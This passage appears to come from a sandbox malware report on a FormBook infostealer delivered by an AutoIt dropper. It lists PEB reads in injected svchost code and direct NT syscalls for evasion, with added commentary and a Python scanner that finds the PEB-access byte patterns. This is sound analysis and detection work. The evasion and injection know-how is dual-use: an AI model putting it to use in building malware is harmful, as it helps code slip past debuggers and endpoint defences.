                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]2_2_036C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h]2_2_036325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h]2_2_036365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov eax, dword ptr fs:[00000030h]2_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h]2_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664588 mov eax, dword ptr fs:[00000030h]2_2_03664588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h]2_2_0366E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h]2_2_036BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h]2_2_036EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362645D mov eax, dword ptr fs:[00000030h]2_2_0362645D
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0365245A  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0362E420  mov eax, dword ptr fs:[00000030h]  (3 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0362C427  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036B6420  mov eax, dword ptr fs:[00000030h]  (7 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0366A430  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03668402  mov eax, dword ptr fs:[00000030h]  (3 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036304E5  mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036364AB  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036644B0  mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036BA4B0  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036EA49A  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0362CB7E  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036E4B4B  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03702B57  mov eax, dword ptr fs:[00000030h]  (4 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036C6B40  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036FAB40  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036D8B42  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03628B50  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036DEB50  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0365EB20  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036F8B28  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03704B00  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036AEB1D  mov eax, dword ptr fs:[00000030h]  (9 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03638BF0  mov eax, dword ptr fs:[00000030h]  (3 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0365EBFC  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036BCBF0  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03650BCB  mov eax, dword ptr fs:[00000030h]  (3 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03630BCD  mov eax, dword ptr fs:[00000030h]  (3 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036DEBD0  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03640BBE  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036E4BB0  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0366CA6F  mov eax, dword ptr fs:[00000030h]  (3 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036DEA60  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036ACA72  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03636A50  mov eax, dword ptr fs:[00000030h]  (7 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03640A5B  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0366CA24  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0365EA2E  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03654A35  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0366CA38  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036BCA11  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0366AAEE  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03686ACC  mov eax, dword ptr fs:[00000030h]  (3 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03630AD0  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03664AD0  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03638AA0  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03686AA4  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0363EA80  mov eax, dword ptr fs:[00000030h]  (9 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03704A80  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03668A90  mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03656962  mov eax, dword ptr fs:[00000030h]  (3 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0367096E  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0367096E  mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036D4978  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036BC97C  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036B0946  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03704940  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036B892A  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036C892B  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036AE908  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036BC912  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03628918  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036BE9E0  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036629F9  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036C69C0  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_0363A9D0  mov eax, dword ptr fs:[00000030h]  (6 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036649D0  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036FA9D3  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036429A0  mov eax, dword ptr fs:[00000030h]  (13 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036309AD  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036B89B3  mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036B89B3  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036BE872  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_036C6870  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03642840  mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03660854  mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03634859  mov eax, dword ptr fs:[00000030h]  (2 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03652835  mov eax, dword ptr fs:[00000030h]  (4 references)
                Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03652835  mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe  Code function: 0_2_002BA66C  GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe  Code function: 0_2_002A81AC  SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe  Code function: 0_2_002A8189  SetUnhandledExceptionFilter
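
The 2_2_ entries above are reads of the PEB pointer out of the TEB (fs:[30h] on 32-bit Windows) inside the code the sample placed in svchost.exe. The sandbox files them under debugger detection, but a PEB-pointer load on its own says little; what matters is the PEB field read next. BeingDebugged (+0x02) and NtGlobalFlag (+0x68) are the anti-debug checks, while Ldr (+0x0C) is how position-independent payloads walk the loaded-module list to resolve APIs without an import table, which is at least as common in injected code of this kind. The scanner below is an added example and not part of the Joe Sandbox report: it finds the byte encodings behind every `mov <reg>, dword ptr fs:[00000030h]` line above in a raw code buffer, names the destination register, and inspects the following instruction to name the field where it is recognisable. The sample buffer is constructed for illustration and the base address is arbitrary. Note also that the 0_2_ entries closing the group (DACL editing, SetUnhandledExceptionFilter) live in the AutoIt runtime the dropper is compiled with, which the AutoIt strings further down confirm, rather than in the FormBook payload.

```python
"""Locate PEB-pointer reads (mov <reg>, dword ptr fs:[30h]) in raw 32-bit x86 code.

Added example; SAMPLE is constructed and the base address used below is arbitrary.
"""
import re
from collections import Counter

TEB_PEB_OFFSET = 0x30   # TEB->ProcessEnvironmentBlock on 32-bit Windows

# ModRM for [disp32] addressing (mod=00, rm=101) carries the destination register in bits 3-5.
_REG_BY_MODRM = {0x05: "eax", 0x0D: "ecx", 0x15: "edx", 0x1D: "ebx",
                 0x25: "esp", 0x2D: "ebp", 0x35: "esi", 0x3D: "edi"}
_REGCODE = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3, "esp": 4, "ebp": 5, "esi": 6, "edi": 7}

# PEB32 fields a PEB-pointer load is typically followed by.
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x10: "ProcessParameters",
              0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}

# 64 = FS segment override; A1 = mov eax, moffs32; 8B /r with a [disp32] ModRM = mov r32, [disp32].
PEB_READ = re.compile(rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00")


def classify_follow_up(code: bytes, end: int, reg: str) -> str:
    """Name the PEB field read by the instruction right after the pointer load, if recognisable.

    Accepts mov r32,[reg+disp8] (8B), mov r8,[reg+disp8] (8A) and movzx r32,byte ptr [reg+disp8]
    (0F B6).  The ModRM for [reg+disp8] is 0x40 | (dst << 3) | reg, so the dst bits are masked out.
    """
    src = _REGCODE[reg]
    if src == 4:                       # [esp+disp8] needs a SIB byte; not handled here
        return "unknown"
    nxt = code[end:end + 4]
    if len(nxt) >= 3 and nxt[0] in (0x8B, 0x8A) and (nxt[1] & 0xC7) == (0x40 | src):
        disp = nxt[2]
    elif len(nxt) >= 4 and nxt[0] == 0x0F and nxt[1] == 0xB6 and (nxt[2] & 0xC7) == (0x40 | src):
        disp = nxt[3]
    else:
        return "unknown"
    return PEB_FIELDS.get(disp, f"field+0x{disp:02X}")


def find_peb_reads(code: bytes, base: int = 0) -> list:
    """Return (address, disassembly, peb_field) for every PEB-pointer load in `code`."""
    hits = []
    for m in PEB_READ.finditer(code):
        raw = m.group(0)
        reg = "eax" if raw[1] == 0xA1 else _REG_BY_MODRM[raw[2]]
        field = classify_follow_up(code, m.end(), reg)
        hits.append((base + m.start(), f"mov {reg}, dword ptr fs:[{TEB_PEB_OFFSET:08X}h]", field))
    return hits


def summarize(hits) -> dict:
    """Count hits per PEB field so anti-debug reads and loader walks can be told apart."""
    return dict(Counter(field for _, _, field in hits))


# Constructed sample: four PEB loads into different registers, each with a different follow-up.
SAMPLE = (
    b"\x55\x8B\xEC"                  # push ebp; mov ebp, esp (filler)
    b"\x64\xA1\x30\x00\x00\x00"      # mov eax, fs:[30h]
    b"\x0F\xB6\x40\x02"              # movzx eax, byte ptr [eax+2]   -> BeingDebugged
    b"\x64\x8B\x0D\x30\x00\x00\x00"  # mov ecx, fs:[30h]
    b"\x8B\x41\x0C"                  # mov eax, [ecx+0Ch]            -> Ldr
    b"\x64\x8B\x15\x30\x00\x00\x00"  # mov edx, fs:[30h]
    b"\x8B\x42\x68"                  # mov eax, [edx+68h]            -> NtGlobalFlag
    b"\x64\x8B\x35\x30\x00\x00\x00"  # mov esi, fs:[30h]
    b"\x8B\x06"                      # mov eax, [esi]                -> not a known field
    b"\xC3"                          # ret
)

if __name__ == "__main__":
    for addr, disasm, field in find_peb_reads(SAMPLE, base=0x400000):
        print(f"{addr:08X}  {disasm:<40} {field}")
    print(summarize(find_peb_reads(SAMPLE)))
```

Run it over a dumped code section (the 2.2.svchost.exe.400000.0.unpack artefact listed under the Yara matches is the kind of input meant) and the per-field summary tells you whether the 170 reads above are debugger checks, module walking, or a mix.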

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtResumeThread: Direct from: 0x773836AC
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtMapViewOfSection: Direct from: 0x77382D1C
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtWriteVirtualMemory: Direct from: 0x77382E3C
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtProtectVirtualMemory: Direct from: 0x77382F9C
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtSetInformationThread: Direct from: 0x773763F9
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtCreateMutant: Direct from: 0x773835CC
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtNotifyChangeKey: Direct from: 0x77383C2C
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtSetInformationProcess: Direct from: 0x77382C5C
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtCreateUserProcess: Direct from: 0x7738371C
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtQueryInformationProcess: Direct from: 0x77382C26
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtResumeThread: Direct from: 0x77382FBC
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtWriteVirtualMemory: Direct from: 0x7738490C
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtAllocateVirtualMemory: Direct from: 0x77383C9C
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtReadFile: Direct from: 0x77382ADC
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtAllocateVirtualMemory: Direct from: 0x77382BFC
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtDelayExecution: Direct from: 0x77382DDC
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtQuerySystemInformation: Direct from: 0x77382DFC
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtOpenSection: Direct from: 0x77382E0C
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtQuerySystemInformation: Direct from: 0x773848CC
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtReadVirtualMemory: Direct from: 0x77382E8C
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtCreateKey: Direct from: 0x77382C6C
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtAllocateVirtualMemory: Direct from: 0x773848EC
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtQueryAttributesFile: Direct from: 0x77382E6C
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtSetInformationThread: Direct from: 0x77382B4C
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtTerminateThread: Direct from: 0x77382FCC
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtQueryInformationToken: Direct from: 0x77382CAC
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtOpenKeyEx: Direct from: 0x77382B9C
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtAllocateVirtualMemory: Direct from: 0x77382BEC
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtDeviceIoControlFile: Direct from: 0x77382AEC
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtCreateFile: Direct from: 0x77382FEC
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  NtOpenFile: Direct from: 0x77382DCC
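
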